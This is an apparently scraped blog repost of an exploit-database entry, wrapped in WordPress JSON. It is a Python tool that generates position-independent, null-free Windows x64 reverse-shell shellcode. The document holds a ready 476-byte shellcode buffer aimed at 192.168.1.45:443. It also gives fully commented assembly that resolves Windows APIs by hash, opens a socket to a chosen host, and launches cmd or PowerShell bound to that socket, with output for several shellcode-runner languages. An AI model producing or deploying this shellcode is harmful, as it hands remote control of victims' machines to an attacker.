import ctypes, struct
\nimport argparse
\nfrom keystone import *<\/p>\n
# Exploit Title: Windows\/x64 – PIC Null-Free TCP Reverse Shell Shellcode (476 Bytes)
\n# Exploit Author: Senzee
\n# Date: 08\/29\/2023
\n# Platform: Windows X64
\n# Tested on: Windows 11 Home\/Windows Server 2022 Standard\/Windows Server 2019 Datacenter
\n# OS Version (respectively): 10.0.22621 \/10.0.20348 \/10.0.17763
\n# Test IP: 192.168.1.45
\n# Test Port: 443
\n# Payload size: 476 bytes
\n# NUll-Free: True
\n# Detailed information can be found at https:\/\/github.com\/senzee1984\/micr0_shell<\/p>\n
# Generated Shellcode (192.168.1.45:443):
\n# Payload size: 476 bytes
\n# buf = b”\\x48\\x31\\xd2\\x65\\x48\\x8b\\x42\\x60\\x48\\x8b\\x70\\x18\\x48\\x8b\\x76\\x20\\x4c\\x8b\\x0e\\x4d”
\n# buf += b”\\x8b\\x09\\x4d\\x8b\\x49\\x20\\xeb\\x63\\x41\\x8b\\x49\\x3c\\x4d\\x31\\xff\\x41\\xb7\\x88\\x4d\\x01″
\n# buf += b”\\xcf\\x49\\x01\\xcf\\x45\\x8b\\x3f\\x4d\\x01\\xcf\\x41\\x8b\\x4f\\x18\\x45\\x8b\\x77\\x20\\x4d\\x01″
\n# buf += b”\\xce\\xe3\\x3f\\xff\\xc9\\x48\\x31\\xf6\\x41\\x8b\\x34\\x8e\\x4c\\x01\\xce\\x48\\x31\\xc0\\x48\\x31″
\n# buf += b”\\xd2\\xfc\\xac\\x84\\xc0\\x74\\x07\\xc1\\xca\\x0d\\x01\\xc2\\xeb\\xf4\\x44\\x39\\xc2\\x75\\xda\\x45″
\n# buf += b”\\x8b\\x57\\x24\\x4d\\x01\\xca\\x41\\x0f\\xb7\\x0c\\x4a\\x45\\x8b\\x5f\\x1c\\x4d\\x01\\xcb\\x41\\x8b”
\n# buf += b”\\x04\\x8b\\x4c\\x01\\xc8\\xc3\\xc3\\x4c\\x89\\xcd\\x41\\xb8\\x8e\\x4e\\x0e\\xec\\xe8\\x8f\\xff\\xff”
\n# buf += b”\\xff\\x49\\x89\\xc4\\x48\\x31\\xc0\\x66\\xb8\\x6c\\x6c\\x50\\x48\\xb8\\x57\\x53\\x32\\x5f\\x33\\x32″
\n# buf += b”\\x2e\\x64\\x50\\x48\\x89\\xe1\\x48\\x83\\xec\\x20\\x4c\\x89\\xe0\\xff\\xd0\\x48\\x83\\xc4\\x20\\x49″
\n# buf += b”\\x89\\xc6\\x49\\x89\\xc1\\x41\\xb8\\xcb\\xed\\xfc\\x3b\\x4c\\x89\\xcb\\xe8\\x55\\xff\\xff\\xff\\x48″
\n# buf += b”\\x31\\xc9\\x66\\xb9\\x98\\x01\\x48\\x29\\xcc\\x48\\x8d\\x14\\x24\\x66\\xb9\\x02\\x02\\x48\\x83\\xec”
\n# buf += b”\\x30\\xff\\xd0\\x48\\x83\\xc4\\x30\\x49\\x89\\xd9\\x41\\xb8\\xd9\\x09\\xf5\\xad\\xe8\\x2b\\xff\\xff”
\n# buf += b”\\xff\\x48\\x83\\xec\\x30\\x48\\x31\\xc9\\xb1\\x02\\x48\\x31\\xd2\\xb2\\x01\\x4d\\x31\\xc0\\x41\\xb0″
\n# buf += b”\\x06\\x4d\\x31\\xc9\\x4c\\x89\\x4c\\x24\\x20\\x4c\\x89\\x4c\\x24\\x28\\xff\\xd0\\x49\\x89\\xc4\\x48″
\n# buf += b”\\x83\\xc4\\x30\\x49\\x89\\xd9\\x41\\xb8\\x0c\\xba\\x2d\\xb3\\xe8\\xf3\\xfe\\xff\\xff\\x48\\x83\\xec”
\n# buf += b”\\x20\\x4c\\x89\\xe1\\x48\\x31\\xd2\\xb2\\x02\\x48\\x89\\x14\\x24\\x48\\x31\\xd2\\x66\\xba\\x01\\xbb”
\n# buf += b”\\x48\\x89\\x54\\x24\\x02\\xba\\xc0\\xa8\\x01\\x2d\\x48\\x89\\x54\\x24\\x04\\x48\\x8d\\x14\\x24\\x4d”
\n# buf += b”\\x31\\xc0\\x41\\xb0\\x16\\x4d\\x31\\xc9\\x48\\x83\\xec\\x38\\x4c\\x89\\x4c\\x24\\x20\\x4c\\x89\\x4c”
\n# buf += b”\\x24\\x28\\x4c\\x89\\x4c\\x24\\x30\\xff\\xd0\\x48\\x83\\xc4\\x38\\x49\\x89\\xe9\\x41\\xb8\\x72\\xfe”
\n# buf += b”\\xb3\\x16\\xe8\\x99\\xfe\\xff\\xff\\x48\\xba\\x9c\\x92\\x9b\\xd1\\x9a\\x87\\x9a\\xff\\x48\\xf7\\xd2″
\n# buf += b”\\x52\\x48\\x89\\xe2\\x41\\x54\\x41\\x54\\x41\\x54\\x48\\x31\\xc9\\x66\\x51\\x51\\x51\\xb1\\xff\\x66″
\n# buf += b”\\xff\\xc1\\x66\\x51\\x48\\x31\\xc9\\x66\\x51\\x66\\x51\\x51\\x51\\x51\\x51\\x51\\x51\\xb1\\x68\\x51″
\n# buf += b”\\x48\\x89\\xe7\\x48\\x89\\xe1\\x48\\x83\\xe9\\x20\\x51\\x57\\x48\\x31\\xc9\\x51\\x51\\x51\\x48\\xff”
\n# buf += b”\\xc1\\x51\\xfe\\xc9\\x51\\x51\\x51\\x51\\x49\\x89\\xc8\\x49\\x89\\xc9\\xff\\xd0″<\/p>\n
def print_banner():
\nbanner=”””
\n\u2588\u2588\u2588\u2557\u2591\u2591\u2591\u2588\u2588\u2588\u2557\u2588\u2588\u2557\u2591\u2588\u2588\u2588\u2588\u2588\u2557\u2591\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2591\u2591\u2588\u2588\u2588\u2588\u2588\u2557\u2591\u2003\u2003\u2591\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2557\u2591\u2591\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2557\u2591\u2591\u2591\u2591\u2591\u2588\u2588\u2557\u2591\u2591\u2591\u2591\u2591
\n\u2588\u2588\u2588\u2588\u2557\u2591\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2003\u2003\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2551\u2591\u2591\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2551\u2591\u2591\u2591\u2591\u2591\u2588\u2588\u2551\u2591\u2591\u2591\u2591\u2591
\n\u2588\u2588\u2554\u2588\u2588\u2588\u2588\u2554\u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2551\u2591\u2591\u255a\u2550\u255d\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2551\u2591\u2591\u2588\u2588\u2551\u2003\u2003\u255a\u2588\u2588\u2588\u2588\u2588\u2557\u2591\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2557\u2591\u2591\u2588\u2588\u2551\u2591\u2591\u2591\u2591\u2591\u2588\u2588\u2551\u2591\u2591\u2591\u2591\u2591
\n\u2588\u2588\u2551\u255a\u2588\u2588\u2554\u255d\u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2551\u2591\u2591\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2551\u2591\u2591\u2588\u2588\u2551\u2003\u2003\u2591\u255a\u2550\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u255d\u2591\u2591\u2588\u2588\u2551\u2591\u2591\u2591\u2591\u2591\u2588\u2588\u2551\u2591\u2591\u2591\u2591\u2591
\n\u2588\u2588\u2551\u2591\u255a\u2550\u255d\u2591\u2588\u2588\u2551\u2588\u2588\u2551\u255a\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2551\u2591\u2591\u2588\u2588\u2551\u255a\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2003\u2003\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2551\u2591\u2591\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557
\n\u255a\u2550\u255d\u2591\u2591\u2591\u2591\u2591\u255a\u2550\u255d\u255a\u2550\u255d\u2591\u255a\u2550\u2550\u2550\u2550\u255d\u2591\u255a\u2550\u255d\u2591\u2591\u255a\u2550\u255d\u2591\u255a\u2550\u2550\u2550\u2550\u255d\u2591\u2003\u2003\u255a\u2550\u2550\u2550\u2550\u2550\u255d\u2591\u255a\u2550\u255d\u2591\u2591\u255a\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d
\n“””
\nprint(banner)
\nprint(“Author: Senzee”)
\nprint(“Original Github Repository: https:\/\/github.com\/senzee1984\/micr0_shell”)
\nprint(“Description: Dynamically generate PIC Null-Free Windows X64 TCP Reverse Shell Shellcode”)
\nprint(“This version does not support shellcode execution”)
\nprint(“Attention: In rare cases (.255 and .0 co-exist), generated shellcode could contain NULL bytes, E.G. when IP is 192.168.0.255\\n\\n”)<\/p>\n
def get_port_argument(port):
\nport_hex_str = format(port, ’04x’)
\nport_part_1, port_part_2 = port_hex_str[2:], port_hex_str[:2]\nif “00” in {port_part_1, port_part_2}:
\nport += 257
\nport_hex_str = format(port, ’04x’)
\nport_part_1, port_part_2 = port_hex_str[2:], port_hex_str[:2]\nreturn f”mov dx, 0x{port_part_1 + port_part_2};\\nsub dx, 0x101;”
\nreturn f”mov dx, 0x{port_part_1 + port_part_2};”<\/p>\n
def get_ip_argument(ip):
\nip_hex_parts = [format(int(part), ’02x’) for part in ip.split(‘.’)]\nreversed_hex = ”.join(ip_hex_parts[::-1])
\nif “00” in ip_hex_parts and “ff” not in ip_hex_parts:
\nhex_int = int(reversed_hex, 16)
\nneg_hex = (0xFFFFFFFF + 1 – hex_int) & 0xFFFFFFFF
\nreturn f”mov edx, 0x{neg_hex:08x};\\nneg rdx;”
\nreturn f”mov edx, 0x{reversed_hex};”<\/p>\n
def get_shell_type_argument(shell_type):
\nif shell_type == “cmd”:
\nreturn f”mov rdx, 0xff9a879ad19b929c;\\nnot rdx;”
\nreturn (f”sub rsp, 8;\\nmov rdx, 0xffff9a879ad19393;\\nnot rdx;\\npush rdx;”
\nf”\\nmov rdx, 0x6568737265776f70;”)<\/p>\n
def output_shellcode(lan,encoding,var,save):
\nsh = b””
\nfor e in encoding:
\nsh += struct.pack(“B”, e)
\nshellcode = bytearray(sh)
\nprint(“[+]Payload size: “+str(len(encoding))+” bytes\\n”)
\ncounter=0<\/p>\n
if lan==”python”:
\nprint(“[+]Shellcode format for Python\\n”)
\nsc = “”
\nsc = var+” = b\\””
\nfor dec in encoding:
\nif counter % 20 == 0 and counter != 0:
\nsc += “\\”\\n”+var+”+=”+”b\\””
\nsc += “\\\\x{0:02x}”.format(int(dec))
\ncounter += 1<\/p>\n
if count % 20 > 0:
\nsc += “\\””
\nprint(sc)<\/p>\n
elif lan==”c”:
\nprint(“[+]Shellcode format for C\\n”)
\nsc = “unsigned char ” + var + “[]={\\n”
\nfor dec in encoding:
\nif counter % 20 == 0 and counter != 0:
\nsc += “\\n”
\nsc += “0x{0:02x}”.format(int(dec))+”,”
\ncounter += 1
\nsc=sc[0:len(sc)-1]+”};”
\nprint(sc)<\/p>\n
elif lan==”powershell”:
\nprint(“[+]Shellcode format for Powershell\\n”)
\nsc = “[Byte[]] $”+var+” = ”
\nfor dec in encoding:
\nsc += “0x{0:02x}”.format(int(dec))+”,”
\nsc=sc[0:len(sc)-1]\nprint(sc)<\/p>\n
elif lan==”csharp”:
\nprint(“[+]Shellcode format for C#\\n”)
\nsc = “byte[] ” + var + “= new byte[“+str(len(encoding))+”] {\\n”
\nfor dec in encoding:
\nif counter % 20 == 0 and counter != 0:
\nsc += “\\n”
\nsc += “0x{0:02x}”.format(int(dec))+”,”
\ncounter += 1
\nsc=sc[0:len(sc)-1]+”};”
\nprint(sc)<\/p>\n
else:
\nprint(“Unsupported language! Exiting…”)
\nexit()<\/p>\n
if save==”true”:
\ntry:
\nwith open(output, ‘wb’) as f:
\nf.write(shellcode)
\nprint(“\\n\\nGenerated shellcode successfully saved in file “+output)
\nexcept Exception as e:
\nprint(e)<\/p>\n
if __name__ == “__main__”:
\nprint_banner()
\nparser = argparse.ArgumentParser(description=’Dynamically generate Windows x64 reverse shell.’)
\nparser.add_argument(‘–ip’, ‘-i’, required=True, dest=’ip’,help=’The listening IP address, default value is 192.168.0.45′)
\nparser.add_argument(‘–port’, ‘-p’, required=False, default=443, dest=’port’,help=’The local listening port, default value is 443′)
\nparser.add_argument(‘–language’, ‘-l’, required=False, default=’python’, dest=’lan’,help=’The language of desired shellcode runner, default language is python. Support c, csharp, python, powershell’)
\nparser.add_argument(‘–variable’, ‘-v’, required=False, default=’buf’, dest=’var’,help=’The variable name of shellcode array, default variable is buf’)
\nparser.add_argument(‘–type’, ‘-t’, required=False, default=’cmd’, dest=’shell_type’,help=’The shell type, Powershell or Cmd, default shell is cmd’)
\nparser.add_argument(‘–save’, ‘-s’, required=False, default=’False’, dest=’save’,help=’Whether to save the generated shellcode to a bin file, True\/False’)
\nparser.add_argument(‘–output’, ‘-o’, required=False, default=”, dest=’output’,help=’If choose to save the shellcode to file, the desired location.’)<\/p>\n
args = parser.parse_args()
\nip=args.ip
\nport=int(args.port)
\nlan=args.lan.lower()
\nvar=args.var
\nshell_type=args.shell_type.lower()
\nsave=args.save.lower()
\noutput=args.output
\nprint(“[+]Shellcode Settings:”)
\nprint(“******** IP Address: “+ip)
\nprint(“******** Listening Port: “+str(port))
\nprint(“******** Language of desired shellcode runner: “+lan)
\nprint(“******** Shellcode array variable name: “+var)
\nprint(“******** Shell: “+shell_type)
\nprint(“******** Save Shellcode to file: “+save+”\\n\\n”)<\/p>\n
args = parser.parse_args()
\nport_argument = get_port_argument(port)
\nip_argument = get_ip_argument(ip)
\nshell_type = get_shell_type_argument(shell_type)<\/p>\n
CODE = (
\n“find_kernel32:”
\n” xor rdx, rdx;”
\n” mov rax, gs:[rdx+0x60];” # RAX stores the value of ProcessEnvironmentBlock member in TEB, which is the PEB address
\n” mov rsi,[rax+0x18];” # Get the value of the LDR member in PEB, which is the address of the _PEB_LDR_DATA structure
\n” mov rsi,[rsi + 0x30];” # RSI is the address of the InInitializationOrderModuleList member in the _PEB_LDR_DATA structure
\n” mov r9, [rsi];” # Current module is python.exe
\n” mov r9, [r9];” # Current module is ntdll.dll
\n” mov r9, [r9+0x10];” # Current module is kernel32.dll
\n” jmp jump_section;”<\/p>\n
“parse_module:” # Parsing DLL file in memory
\n” mov ecx, dword ptr [r9 + 0x3c];” # R9 stores the base address of the module, get the NT header offset
\n” xor r15, r15;”
\n” mov r15b, 0x88;” # Offset to Export Directory
\n” add r15, r9;”
\n” add r15, rcx;”
\n” mov r15d, dword ptr [r15];” # Get the RVA of the export directory
\n” add r15, r9;” # R14 stores the VMA of the export directory
\n” mov ecx, dword ptr [r15 + 0x18];” # ECX stores the number of function names as an index value
\n” mov r14d, dword ptr [r15 + 0x20];” # Get the RVA of ENPT
\n” add r14, r9;” # R14 stores the VMA of ENPT<\/p>\n
“search_function:” # Search for a given function
\n” jrcxz not_found;” # If RCX is 0, the given function is not found
\n” dec ecx;” # Decrease index by 1
\n” xor rsi, rsi;”
\n” mov esi, [r14 + rcx*4];” # RVA of function name string
\n” add rsi, r9;” # RSI points to function name string<\/p>\n
“function_hashing:” # Hash function name function
\n” xor rax, rax;”
\n” xor rdx, rdx;”
\n” cld;” # Clear DF flag<\/p>\n
“iteration:” # Iterate over each byte
\n” lodsb;” # Copy the next byte of RSI to Al
\n” test al, al;” # If reaching the end of the string
\n” jz compare_hash;” # Compare hash
\n” ror edx, 0x0d;” # Part of hash algorithm
\n” add edx, eax;” # Part of hash algorithm
\n” jmp iteration;” # Next byte<\/p>\n
“compare_hash:” # Compare hash
\n” cmp edx, r8d;”
\n” jnz search_function;” # If not equal, search the previous function (index decreases)
\n” mov r10d, [r15 + 0x24];” # Ordinal table RVA
\n” add r10, r9;” # Ordinal table VMA
\n” movzx ecx, word ptr [r10 + 2*rcx];” # Ordinal value -1
\n” mov r11d, [r15 + 0x1c];” # RVA of EAT
\n” add r11, r9;” # VMA of EAT
\n” mov eax, [r11 + 4*rcx];” # RAX stores RVA of the function
\n” add rax, r9;” # RAX stores VMA of the function
\n” ret;”
\n“not_found:”
\n” ret;”<\/p>\n
“jump_section:” # Achieve PIC and elminiate 0x00 byte
\n” mov rbp, r9;” # RBP stores base address of Kernel32.dll
\n” mov r8d, 0xec0e4e8e;” # LoadLibraryA Hash
\n” call parse_module;” # Search LoadLibraryA’s address
\n” mov r12, rax;” # R12 stores the address of LoadLibraryA function<\/p>\n
“load_module:”
\n” xor rax, rax;”
\n” mov ax, 0x6c6c;” # Save the string “ll” to RAX
\n” push rax;” # Push the string to the stack
\n” mov rax, 0x642E32335F325357;” # Save the string “WS2_32.D” to RAX
\n” push rax;” # Push the string to the stack
\n” mov rcx, rsp;” # RCX points to the “WS2_32.dll” string
\n” sub rsp, 0x20;” # Function prologue
\n” mov rax, r12;” # RAX stores address of LoadLibraryA function
\n” call rax;” # LoadLibraryA(“ws2_32.dll”)
\n” add rsp, 0x20;” # Function epilogue
\n” mov r14, rax;” # R14 stores the base address of ws2_32.dll<\/p>\n
“call_wsastartup:”
\n” mov r9, rax;” # R9 stores the base address of ws2_32.dll
\n” mov r8d, 0x3bfcedcb;” # Hash of WSAStartup
\n” mov rbx, r9;” # Save the base address of ws2_32.dll to RBX for later use
\n” call parse_module;” # Search for and get the address of WSAStartup
\n” xor rcx, rcx;”
\n” mov cx, 0x198;”
\n” sub rsp, rcx;” # Reserve enough space for the lpWSDATA structure
\n” lea rdx, [rsp];” # Assign the address of lpWSAData to the RDX register as the 2nd parameter
\n” mov cx, 0x202;” # Assign 0x202 to wVersionRequired and store it in RCX as the 1st parameter
\n” sub rsp, 0x30;” # Function prologue
\n” call rax;” # Call WSAStartup
\n” add rsp, 0x30;” # Function epilogue<\/p>\n
“call_wsasocket:”
\n” mov r9, rbx;”
\n” mov r8d, 0xadf509d9;” # Hash of WSASocketA function
\n” call parse_module;” # Get the address of WSASocketA function
\n” sub rsp, 0x30;” # Function prologue
\n” xor rcx, rcx;”
\n” mov cl, 2;” # AF is 2 as the 1st parameter
\n” xor rdx, rdx;”
\n” mov dl, 1;” # Type is 1 as the 2nd parameter
\n” xor r8, r8;”
\n” mov r8b, 6;” # Protocol is 6 as the 3rd parameter
\n” xor r9, r9;” # lpProtocolInfo is 0 as the 4th parameter
\n” mov [rsp+0x20], r9;” # g is 0 as the 5th parameter, stored on the stack
\n” mov [rsp+0x28], r9;” # dwFlags is 0 as the 6th parameter, stored on the stack
\n” call rax;” # Call WSASocketA function
\n” mov r12, rax;” # Save the returned socket type return value in R12 to prevent data loss in RAX
\n” add rsp, 0x30;” # Function epilogue<\/p>\n
“call_wsaconnect:”
\n” mov r9, rbx;”
\n” mov r8d, 0xb32dba0c;” # Hash of WSAConnect
\n” call parse_module;” # Get the address of WSAConnect
\n” sub rsp, 0x20;” # Allocate enough space for the socketaddr structure
\n” mov rcx, r12;” # Pass the socket descriptor returned by WSASocketA to RCX as the 1st parameter
\n” xor rdx, rdx;”
\n” mov dl, 2;” # Set sin_family to AF_INET (=2)
\n” mov [rsp], rdx;” # Store the socketaddr structure
\n” xor rdx, rdx;”
\nf”{port_argument}” # Set local port dynamically
\n” mov [rsp+2], rdx;” # Pass the port value to the corresponding position in the socketaddr structure
\nf”{ip_argument}”
\n” mov [rsp+4], rdx;” # Pass IP to the corresponding position in the socketaddr structure
\n# ” xor r8, r8;”
\n# ” mov [rsp+8], r8;” # Set zero for sin_zero. Comment these 2 lines to save more bytes, does not prevent the shellcode from working
\n” lea rdx, [rsp];” # Pointer to the socketaddr structure as the 2nd parameter
\n” xor r8, r8;”
\n” mov r8b, 0x16;” # Set namelen member to 0x16
\n” xor r9, r9;” # lpCallerData is 0 as the 4th parameter
\n” sub rsp, 0x38;” # Function prologue
\n” mov [rsp+0x20], r9;” # lpCalleeData is 0 as the 5th parameter
\n” mov [rsp+0x28], r9;” # lpSQOS is 0 as the 6th parameter
\n” mov [rsp+0x30], r9;” # lpGQOS is 0 as the 7th parameter
\n” call rax;” # Call WSAConnect
\n” add rsp, 0x38;” # Function epilogue<\/p>\n
“call_createprocess:”
\n” mov r9, rbp;” # R9 stores the base address of Kernel32.dll
\n” mov r8d, 0x16b3fe72;” # Hash of CreateProcessA
\n” call parse_module;” # Get the address of CreateProcessA
\nf”{shell_type}”
\n” push rdx;”
\n” mov rdx, rsp;” # Pointer to “cmd.exe” is stored in the RCX register
\n” push r12;” # The member STDERROR is the return value of WSASocketA
\n” push r12;” # The member STDOUTPUT is the return value of WSASocketA
\n” push r12;” # The member STDINPUT is the return value of WSASocketA
\n” xor rcx, rcx;”
\n” push cx;” # Pad with 0x00 before pushing the dwFlags member, only the total size matters
\n” push rcx;”
\n” push rcx;”
\n” mov cl, 0xff;”
\n” inc cx;” # 0xff+1=0x100
\n” push cx;” # dwFlags=0x100
\n” xor rcx, rcx;”
\n” push cx;” # Pad with 0 before pushing the cb member, only the total size matters
\n” push cx;”
\n” push rcx;”
\n” push rcx;”
\n” push rcx;”
\n” push rcx;”
\n” push rcx;”
\n” push rcx;”
\n” mov cl, 0x68;”
\n” push rcx;” # cb=0x68
\n” mov rdi, rsp;” # Pointer to STARTINFOA structure
\n” mov rcx, rsp;”
\n” sub rcx, 0x20;” # Reserve enough space for the ProcessInformation structure
\n” push rcx;” # Address of the ProcessInformation structure as the 10th parameter
\n” push rdi;” # Address of the STARTINFOA structure as the 9th parameter
\n” xor rcx, rcx;”
\n” push rcx;” # Value of lpCurrentDirectory is 0 as the 8th parameter
\n” push rcx;” # lpEnvironment=0 as the 7th argument
\n” push rcx;” # dwCreationFlags=0 as the 6th argument
\n” inc rcx;”
\n” push rcx;” # Value of bInheritHandles is 1 as the 5th parameter
\n” dec cl;”
\n” push rcx;” # Reserve space for the function return area (4th parameter)
\n” push rcx;” # Reserve space for the function return area (3rd parameter)
\n” push rcx;” # Reserve space for the function return area (2nd parameter)
\n” push rcx;” # Reserve space for the function return area (1st parameter)
\n” mov r8, rcx;” # lpProcessAttributes value is 0 as the 3rd parameter
\n” mov r9, rcx;” # lpThreatAttributes value is 0 as the 4th parameter
\n” call rax;” # Call CreateProcessA
\n)<\/p>\n
ks = Ks(KS_ARCH_X86, KS_MODE_64)
\nencoding, count = ks.asm(CODE)
\noutput_shellcode(lan,encoding,var,save)<\/p>\n","protected":false},"excerpt":{"rendered":"
import ctypes, struct import argparse from keystone import * # Exploit Title: Windows\/x64 – PIC Null-Free TCP Reverse Shell Shellcode (476 Bytes) # Exploit Author: Senzee # Date: 08\/29\/2023 # Platform: Windows X64 # Tested on: Windows 11 Home\/Windows Server 2022 Standard\/Windows Server 2019 Datacenter # OS Version (respectively): 10.0.22621 \/10.0.20348 \/10.0.17763 # Test IP: …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-48096","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/48096","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=48096"}],"version-history":[{"count":1,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/48096\/revisions"}],"predecessor-version":[{"id":48330,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/48096\/revisions\/48330"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=48096"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=48096"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=48096"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}